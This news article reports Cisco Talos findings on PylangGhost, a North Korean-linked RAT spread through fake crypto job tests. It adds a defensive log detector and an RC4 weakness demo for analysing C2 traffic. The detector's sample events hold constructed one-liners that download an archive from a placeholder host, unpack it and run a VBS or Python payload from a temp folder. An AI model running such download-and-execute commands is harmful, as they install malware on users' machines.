A North Korean hacking group is targeting crypto workers with Python-based malware disguised as part of a fake job application process, researchers at Cisco Talos said earlier this week.
Most victims appear to be based in India, according to open-source signals, and most have past experience at blockchain and cryptocurrency startups.
While Cisco does not report any evidence of internal compromise, the wider risk is clear: the aim is a foothold in whichever company these individuals eventually join.
The malware, called PylangGhost, is a new variant of the previously documented GolangGhost remote access trojan (RAT) and shares most of the same features, rewritten in Python to better target Windows systems.
Mac users are still targeted with the Golang version, while Linux systems appear to be unaffected. The threat actor behind the campaign, tracked as Famous Chollima, has been active since mid-2024 and is assessed to be a DPRK-aligned group.
Their latest attack chain is simple: impersonate top crypto companies such as Coinbase, Robinhood and Uniswap through highly polished fake career sites, and lure software engineers, marketers and designers into completing a staged "skill test."
Once a target has filled in basic information and answered technical questions, they are asked to install fake video drivers by pasting a command into their terminal; that command quietly downloads and launches the Python-based RAT. No legitimate recruitment process requires a candidate to run commands on their own machine, and that step alone should end the conversation.
The payload is hidden in a ZIP file that contains the renamed Python interpreter (nvidia.py), a Visual Basic script that unpacks the archive, and six core modules responsible for persistence, system fingerprinting, file transfer, remote shell access and browser data theft.
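The lure described above boils down to one observable on the endpoint: a user-driven shell command that downloads an archive, unpacks it and launches a script or interpreter from a temporary directory, all chained in a single command line. The detection heuristic below is an added example, not code from Cisco Talos or from the campaign; the process-creation records, host names, URLs and command lines in it are constructed to have that shape and are not the actual command the attackers used.

```python
import re

# Constructed process-creation events in a simplified key=value form. They are
# invented for this example, not telemetry from the Talos report; the first two
# only model the shape of a "paste this command to install video drivers" lure
# (download an archive, unpack it, run a script or interpreter from a temp path).
SAMPLE_EVENTS = [
    r'ts=2025-06-18T10:02:11Z host=WS-DEV-07 user=alice parent=explorer.exe image=cmd.exe '
    r'cmdline="cmd.exe /c curl -o %TEMP%\drv.zip https://example.invalid/nv/drv.zip && '
    r'tar -xf %TEMP%\drv.zip -C %TEMP% && wscript %TEMP%\update.vbs"',
    r'ts=2025-06-18T10:05:40Z host=WS-DEV-07 user=alice parent=explorer.exe image=powershell.exe '
    r'cmdline="powershell -w hidden -c iwr https://example.invalid/p.zip -OutFile $env:TEMP\p.zip; '
    r'Expand-Archive $env:TEMP\p.zip $env:TEMP\p; python $env:TEMP\p\nvidia.py"',
    r'ts=2025-06-18T10:07:02Z host=WS-DEV-07 user=alice parent=powershell.exe image=curl.exe '
    r'cmdline="curl -o report.pdf https://example.invalid/q2/report.pdf"',
    r'ts=2025-06-18T10:09:55Z host=WS-DEV-07 user=alice parent=userinit.exe image=wscript.exe '
    r'cmdline="wscript.exe \\fileserver\scripts\logon.vbs"',
    r'ts=2025-06-18T10:12:13Z host=WS-DEV-07 user=alice parent=cmd.exe image=tar.exe '
    r'cmdline="tar -xf C:\Users\alice\Downloads\logs.tar"',
]

# Each stage of the lure gets its own indicator pattern. Any single stage is
# everyday activity, so the detector only fires when stages appear chained.
STAGES = {
    "download": re.compile(
        r"\b(curl|wget|bitsadmin|invoke-webrequest|iwr|downloadfile|downloadstring)\b"
        r"|certutil[^&;|]*-urlcache", re.I),
    "unpack": re.compile(r"\b(tar|unzip|expand-archive|7z)\b", re.I),
    "execute": re.compile(
        r"\b(wscript|cscript|mshta|regsvr32|rundll32|python[0-9.]*|pythonw)\b"
        r"|\.(vbs|js|hta|py)\b", re.I),
}
# Staging directories a pasted one-liner typically writes into.
TEMP_PATH = re.compile(
    r"%temp%|\$env:temp|\\appdata\\local\\temp\\|\\users\\public\\|\\programdata\\", re.I)

KV = re.compile(r'(\w+)=("[^"]*"|\S+)')


def parse_event(line: str) -> dict:
    """Split a key=value line into a dict, stripping quotes from quoted values."""
    return {k: v.strip('"') for k, v in KV.findall(line)}


def classify(event: dict):
    """Return (severity, matched stages); severity is None when nothing chains."""
    cmd = event.get("cmdline", "")
    matched = [name for name, pat in STAGES.items() if pat.search(cmd)]
    if len(matched) < 2:
        return None, matched
    # Download, unpack and execute in one command line, touching a temp or
    # public directory, is the full shape of the lure; two stages is worth a look.
    if len(matched) == 3 and TEMP_PATH.search(cmd):
        return "high", matched
    return "medium", matched


def detect(lines):
    """Run the heuristic over raw log lines and return the flagged events."""
    hits = []
    for line in lines:
        ev = parse_event(line)
        severity, stages = classify(ev)
        if severity:
            hits.append({"ts": ev.get("ts"), "image": ev.get("image"),
                         "severity": severity, "stages": stages})
    return hits


if __name__ == "__main__":
    for hit in detect(SAMPLE_EVENTS):
        print(hit)
```

Run against the constructed events, only the two chained one-liners are flagged; the lone download, the logon script and the archive extraction are not. In production the same logic belongs in the EDR or SIEM as a rule on process-creation telemetry, with the parent process (an interactive shell spawned from the desktop or a browser) as an extra condition.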
The RAT harvests login credentials, session cookies and wallet data from over 80 browser extensions, including MetaMask, Phantom, TronLink and 1Password.
The command set allows full remote control of infected machines, including file upload and download, system fingerprinting and launching a remote shell, all directed through RC4-encrypted HTTP packets.
RC4-encrypted HTTP packets are data sent over plain HTTP with the body encrypted using RC4, a stream cipher that has been deprecated since 2015 (RFC 7465 prohibits it in TLS) because of statistical biases in its keystream. The encryption hides the traffic from casual inspection but offers little real protection: RC4 provides no integrity check, reusing a key exposes the XOR of two messages, and because the malware has to carry the key to encrypt anything at all, an analyst who extracts it from the sample can decrypt captured command-and-control traffic.
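To make the RC4 point concrete, the following is an added example written for this article, not code from the Talos report or from the malware. The key, beacon contents and host identifier are constructed for the demonstration; the article does not say how the real sample derives or rotates its key, so the key-reuse part shows a general property of RC4 under a fixed key rather than a confirmed behaviour of PylangGhost.

```python
# Added example: why RC4 over HTTP is obfuscation rather than protection.
# 1. Once the key is recovered from the sample, captured traffic decrypts.
# 2. RC4 has no integrity check: known plaintext lets anyone rewrite a packet.
# 3. Two packets under the same key share a keystream, so c1 ^ c2 = p1 ^ p2.

def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 (KSA + PRGA). Encryption and decryption are the same operation."""
    S = list(range(256))
    j = 0
    for i in range(256):                      # key-scheduling algorithm
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for byte in data:                         # pseudo-random generation algorithm
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


# Hypothetical key and beacon, constructed for this example, not values from
# the real sample. The operator's key has to live inside the malware, so
# pulling it out of the binary is the same work as reading this constant.
RECOVERED_KEY = b"example-key-from-sample"
BEACON = b'{"id":"WS-DEV-07","cmd":"sysinfo"}'


def decrypt_capture(key: bytes, body: bytes) -> bytes:
    """What an analyst does with a captured HTTP body once the key is known."""
    return rc4(key, body)


def forge(ciphertext: bytes, offset: int, known: bytes, wanted: bytes) -> bytes:
    """Rewrite an RC4 ciphertext without knowing the key. Because a stream
    cipher is a plain XOR with keystream and RC4 adds no MAC, XORing the
    ciphertext with (known ^ wanted) at the right offset decrypts to `wanted`."""
    assert len(known) == len(wanted)
    patched = bytearray(ciphertext)
    for n, (k, w) in enumerate(zip(known, wanted)):
        patched[offset + n] ^= k ^ w
    return bytes(patched)


def recover_peer(c1: bytes, c2: bytes, p1_known: bytes) -> bytes:
    """Two packets encrypted under the same key (no nonce) share a keystream:
    c1 ^ c2 = p1 ^ p2, so knowing p1 reveals p2 over the overlapping length."""
    return bytes(a ^ b ^ k for a, b, k in zip(c1, c2, p1_known))


if __name__ == "__main__":
    ct = rc4(RECOVERED_KEY, BEACON)
    print("decrypted :", decrypt_capture(RECOVERED_KEY, ct))
    off = BEACON.index(b"WS-DEV-07")
    forged = forge(ct, off, b"WS-DEV-07", b"WS-DEV-99")
    print("forged    :", rc4(RECOVERED_KEY, forged))
    second = rc4(RECOVERED_KEY, b'{"id":"WS-DEV-07","cmd":"shell"}')
    print("leaked p2 :", recover_peer(ct, second, BEACON))
```

The first check in the usage block is the everyday analyst workflow: key out of the sample, traffic in the clear. The second and third are the reasons RC4 on its own would be a poor choice even for a legitimate protocol, and why defenders reading such traffic should not assume what they see is authentic.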
Despite being a rewrite, the structure and naming conventions of PylangGhost mirror those of GolangGhost almost exactly, which suggests both were probably written by the same operator, Cisco said.
Read more: North Korean hackers target crypto developers with US shell company